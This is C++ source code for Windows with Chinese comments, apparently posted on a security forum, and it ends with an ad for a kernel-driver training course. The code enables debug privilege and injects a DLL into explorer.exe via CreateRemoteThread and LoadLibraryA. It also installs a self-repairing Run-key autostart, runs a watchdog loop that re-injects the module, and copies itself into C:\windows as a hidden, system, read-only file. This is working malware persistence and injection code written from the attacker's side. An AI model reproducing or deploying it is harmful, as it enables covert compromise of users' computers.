[CODE][CODE]
#include <Tlhelp32.h>
//提权
bool EnablePrivilege(char*PrivilegeName,BOOL IsEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
{
return false;
}
if(!LookupPrivilegeValue(NULL, PrivilegeName, &luid))
{
return false;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (IsEnable) ? SE_PRIVILEGE_ENABLED : 0;
BOOL bSucc = AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return (GetLastError() == ERROR_SUCCESS);
}
//获取PID值
BOOL GetProcessIdByName(LPSTR szProcessName,LPDWORD lpPID)//PID是我们要传出去的指针变量
{
//变量及初始化
STARTUPINFO st;
PROCESS_INFORMATION pi;
PROCESSENTRY32 ps;
HANDLE hSnapshot;
ZeroMemory(&st,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
st.cb = sizeof(STARTUPINFO);
ZeroMemory(&ps,sizeof(PROCESSENTRY32));
ps.dwSize = sizeof(PROCESSENTRY32);
//遍历进程
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
return FALSE;
}
if (!Process32First(hSnapshot,&ps))
{
return FALSE;
}
do
{
//比较进程名
if (lstrcmpi(ps.szExeFile,szProcessName) == 0)
{
//找到了
*lpPID = ps.th32ProcessID;
CloseHandle(hSnapshot);
return TRUE;
}
} while (Process32Next(hSnapshot,&ps));
//没有找到
CloseHandle(hSnapshot);
return FALSE;
}
//注入函数
//pid 我们的目标PID
//szMyDll 我们需要注入的DLL
HANDLE InjeckDll(DWORD pid,CString szMyDll)
{
EnablePrivilege(SE_DEBUG_NAME,true);
HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
LPVOID Address = NULL;
PSTR pszLibFileRemote =(PSTR)VirtualAllocEx(hand,NULL,szMyDll.GetLength()+1,MEM_COMMIT,PAGE_READWRITE);
::WriteProcessMemory(hand,pszLibFileRemote,szMyDll.GetBuffer(0),szMyDll.GetLength()+1,NULL);
HMODULE hmod = ::GetModuleHandle("Kernel32");
szMyDll.ReleaseBuffer();
PTHREAD_START_ROUTINE point = (PTHREAD_START_ROUTINE)::GetProcAddress(hmod,"LoadLibraryA");
//创建远程线程执行LoadLibraryA 注入我们自己的DLL文件
HANDLE handr = CreateRemoteThread(hand,NULL,0,point,(LPVOID)pszLibFileRemote,0,NULL);
WaitForSingleObject(handr,INFINITE);
EnablePrivilege(SE_DEBUG_NAME,false);//还原权限
return handr;
}
BOOL Watch(LPVOID pvparam)//这个参数没有什么用,是我刚开始的时候加的,就没有删掉
{
HANDLE wethread=(HANDLE)pvparam;
HKEY hkey;
TCHAR wtname[MAX_PATH] = "C:\\windows\\Main.exe";//这个是写入注册表的路径
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);//打开注册表
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error\n"));//调试信息不用管
break;
}
ret=RegQueryValueEx(hkey,"Main.exe",NULL,NULL,(LPBYTE)lpdata,&dwbuflen);//查找有没有Main.exe
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error\n"));
break;
}
//如果没有就重新写入我们的Main.exe
ret=RegSetValueEx(hkey,"Main.exe",NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegSetValueEx Error\n"));
break;
}
}
//下面的代码表示如果explorer.exe中没有我们的模块,我们重新注入
DWORD pid =0;
GetProcessIdByName("explorer.exe",&pid);//我们选择注入Explorer.exe
HANDLE DesProcess = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
if (!EnumMoudle(DesProcess,"KernelSoft.dll"))//自定义函数,查找模块
{
InjeckDll(pid,DesDllName);//自定义函数,注入
}
Sleep(1000);
}
return 0;
}
//在Windows下寻找我自己的模块,找不到就复制我自己的模块过去
/*
LookFileName[] Windows下的模块C:\\windows\\Main.exe
name[] 将要复制到C盘的模块的地址,就是当前文件夹的路径
*/
void SetFile(char LookFileName[],char name[])
{
BOOL sign = FALSE; //是否找到我需要的文件
CFileFind ff;
BOOL work = ff.FindFile("C:\\windows\\");//查找的文件路径,我是硬编码的
while(work)
{
work = ff.FindNextFile();
CString filepath = ff.GetFilePath();//得到文件的完整路径
CString MainName;
MainName.Format("%s",LookFileName);
if (filepath == MainName)
{
sign = TRUE;
break;
}
}
ff.Close();
if (!sign)//如果没找到,那么复制我自己的文件过去
{
CopyFile(name,LookFileName,FALSE);//把文件复制到C:\\windows下
//设置文件属性
SetFileAttributes(LookFileName,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
}
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课